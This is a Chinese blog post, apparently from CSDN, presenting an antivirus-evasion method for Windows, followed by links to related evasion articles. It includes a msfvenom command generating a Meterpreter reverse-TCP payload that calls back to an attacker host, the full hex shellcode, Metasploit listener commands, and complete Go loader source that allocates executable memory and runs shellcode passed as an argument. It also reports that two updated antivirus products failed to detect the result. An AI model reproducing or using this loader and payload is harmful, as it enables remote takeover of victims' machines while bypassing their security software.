shellcode免杀之命令行加载shellcode过杀软

最新推荐文章于 2024-07-19 21:27:44 发布
最新推荐文章于 2024-07-19 21:27:44 发布
阅读量445 收藏
点赞数
分类专栏: 免杀专题 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65244586/article/details/123161269
版权

0x00 实验环境

攻击机:Kali 192.168.32.128

靶 机:Win7 192.168.32.139

0x01 制作shellcode

Kali执行

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.32.128 lport=8010 -f c

img

将shellcode处理成16进制,结果如下:

img

fc4883e4f0e8cc000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b020f85720000008b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94bffffff5d49be7773325f3332000041564989e64881eca00100004989e549bc02001f4ac0a8208041544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd56a0a415e50504d31c94d31c048ffc04889c248ffc04889c141baea0fdfe0ffd54889c76a1041584c89e24889f941ba99a57461ffd585c0740a49ffce75e5e8930000004883ec104889e24d31c96a0441584889f941ba02d9c85fffd583f8007e554883c4205e89f66a404159680010000041584889f24831c941ba58a453e5ffd54889c34989c74d31c94989f04889da4889f941ba02d9c85fffd583f8007d2858415759680040000041586a005a41ba0b2f0f30ffd5575941ba756e4d61ffd549ffcee93cffffff4801c34829c64885f675b441ffe7586a005949c7c2f0b5a256ffd5

0x02 建立监听

在kali建立监听

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.32.128
lhost => 192.168.32.128
msf exploit(handler) > set lport 8010
lport => 8010
msf exploit(handler) > run

0x03 go语言加载shellcode免杀

go语言VirtualAlloc函数加载shellcode 过杀软

核心代码

img

package main

import (
	"syscall"
	"unsafe"
	"encoding/hex"
	"os"
)

func Run(sc []byte) {
	var kernel32 = syscall.MustLoadDLL("kernel32.dll")
	var ntdll = syscall.MustLoadDLL("ntdll.dll")
	var VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
	var RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")

	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sc)), 0x1000|0x2000, 0x40)
	RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)))
	syscall.Syscall(addr, 0, 0, 0, 0)
}

func main(){
 	sc, _ := hex.DecodeString(os.Args[1])
	Run(sc)
}

编译

build bypass.go

生成bypass.exe文件

img

0x04 测试免杀

放到已安装某绒和某60的win7虚机测试

这里某绒已是最新版

img

未报毒

img

某60也已是最新版

img

同样未报毒

img

0x05 上线

执行bypass.exe shellcode

img

明明如月001
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MakeCode:DLL转换为Shellcode
05-19
Shellcode通常用于绕过系统安全机制,比如在注入攻击中,攻击者会将Shellcode注入到目标进程的内存中执行恶意代码。由于Shellcode不依赖于磁盘上的可执行文件,因此它能更隐蔽地运行。将DLL转换成Shellcode可以使得...
shellcode免杀之VirtualAlloc函数加载shellcode
orange777
02-27 1007
go语言木马免杀
9.4 RetLibc实战之利用VirtualAlloc
qq_55202378的博客
11-14 724
Ret2LIbc
【渗透实战】木马免杀
最新发布
Hacker_doggy的博客
07-19 860
base64 sgn编码。
ShellCode免杀的一些方法
qq_68890680的博客
06-26 638
申请内存空间:VirtualAlloc(在调用进程的虚拟地址空间中保留、提交或更改页面区域的状态分配的内存初始化为零)、VirtualAlloc2(进程注入:在指定进程的虚拟地址空间内保留、提交或更改内存区域的状态。该函数将其分配的内存初始化为零)、VirtualAllocEx(进程注入:在指定进程的虚拟地址空间内保留、提交或更改内存区域的状态。常见的加密解密方式:AES加密、hex加密、XOR+base64加密、Base85+XOR+RC4。加载方式:基础加载,纤程加载,远程加载
Python shellcode免杀
qq_25761407的博客
04-02 5579
Python shellcode免杀
shellcode 免杀 ——python3
时光凉春衫薄的博客
12-28 1889
python shellcode 免杀上线
第六十八课:基于Ruby内存加载shellcode第一季.docx
09-15
根据提供的文档信息,本文将详细解释“第六十八课:基于Ruby内存加载shellcode第一季”中的关键知识点。主要内容包括理解shellcode的概念、如何利用Ruby语言生成shellcode以及如何在内存中加载并执行shellcode。 ##...
通过shellcode调用信息框-易语言
06-12
这种技术常见于缓冲区溢出攻击中,攻击者通过注入shellcode来绕过安全机制并执行恶意代码。 在易语言中,这是一种高级中文编程语言,旨在简化编程过程。然而,shellcode通常与低级别的语言如汇编或C紧密相关,因为...
“冲击波”病毒的shellcode
05-31
在“冲击波”病毒的情境下,Shellcode被设计为绕过正常的安全机制,并利用操作系统的漏洞来执行恶意指令。 #### 四、“冲击波”病毒的Shellcode分析 根据给定的部分内容,我们可以看到这段Shellcode主要是用汇编...
shellcode简单例子
10-28
这段shellcode的主要功能是在Windows NT 5.0 (即Windows XP)系统上创建一个命令行界面,并执行特定的命令。具体来说,该shellcode的执行流程包括: 1. **设置堆栈框架**: - `\x55`:调用`push ebp`指令,保存旧的...
生命在于学习——免杀
易水哲的博客
10-25 2316
一些免杀的知识,没有实操。
9.3 Ret2Libc 实战之利用VirtualProtect
qq_55202378的博客
11-08 2068
VirtualProtect DEP绕过
免杀简述2(二次编译shellcode\远程加载shellcode\shellcode远程线程注入\内存申请优化\管道技术)
热门推荐
Shanfenglan's blog
08-09 33万+
二次编译 也可以理解成shellcode混淆,将shellcode执行前进行各种加密,然后执行的时候进行解密。Xor就是一个例子。原理是先将加密后的shellcode写入程序中,然后再在程序里面写入shellcode解密程序,这样子将shellcode混淆后,特征码等各种数值就会改变,可以绕过大部分的静态查,加密方法不限制,自己写也是可以的。Exp:xor加密shellcode代码: #include stdio.h #define KEY 0x97 //进行异或的字符unsigned char
linux源码免杀,免杀shellcode 2020/11/29 VirtualAlloc&HeapAlloc
weixin_33761747的博客
05-12 306
编译环境VS2019Kali Linux 2020.3VirusTotal 检测运行截图食用步骤1、msfvenom生成shellcoderoot@kali:~/Desktop# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.110.128 LPORT=4444 -f raw -o shell.png2、编译可执行文件Virtu...
Windows Shellcode学习笔记——利用VirtualAlloc绕过DEP
weixin_34268843的博客
09-19 575
本文讲的是Windows Shellcode学习笔记——利用VirtualAlloc绕过DEP, 0x00 前言 接着介绍DEP绕过的另一种方法——利用VirtualAlloc绕过DEP。通过VirtualAlloc函数可以申请一段具有可执行属性的内存,相比于VirtualProtect,传入VirtualAlloc的四个参数不需要先读取再赋值,可在s...
免杀技术之优雅地绕过函数调用链
蛇矛实验室
04-18 841
最简单的绕过是使用类似功能的函数进行替代,这里也可能存在一个问题,就是常见的那些函数已经被挂钩了,因为很多沙箱默认就挂钩了很多内存相关的API,如果我们如果只是替换一些函数可能还是会被检测到,当然不排除这些方式可以绕过一些沙箱,单这次遇到的沙箱我测试替换了很多API还是会被检测到。下一步我们要去判断件架构,为什么要进行这一步是取决于我们的ShellCode是多少位的,这里我的ShellCode是64位,所以要过滤掉32位进程,不然在后续找到可读可写可执行内存的时候我们虽然可以写入到内存,但不能执行起来。
使用shellcode打造MSF免杀payload及shellcode加载技术
jackey3Lin的专栏
10-21 5490
0x00 前言      经常有同学提及MSF payload的免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀的payload,那就是shellcode。  0x01 从哪里开始      shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode的生成功能,接下来我们就拿最常用的payload:reverse
免杀对抗-反沙盒+反调试
xiaoheizi的博客
10-07 1241
为了逃避沙箱/安全人员的检测,恶意件使用了各类识别沙箱/虚拟机的技术,用于判断自身程序是否运行在沙箱/虚拟机中。其中比较有效的方案是动态沙箱检测技术,即通过在沙箱中运行程序并观察程序行为来判断程序是否为恶意程序。3.将重新生成的受保护的exe程序再次使用ollydbg调试,可以看到已经不能正常调试了。4.将exe程序放到虚拟机中无法运行,证明代码成功检测出当前处在虚拟环境中。3.msf设置监听,在真机运行exe程序,msf成功上线。3.将exe程序上传到虚拟机,exe程序无法运行。
shellcode 免杀
05-29
Shellcode 免杀技术是指通过对 Shellcode 代码进行加密、混淆、变形等手段,使其在被件或安全设备检测时无法被识别,从而达到免杀的目的。 以下是一些常见的 Shellcode 免杀技术: 1. 加密:将 Shellcode ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值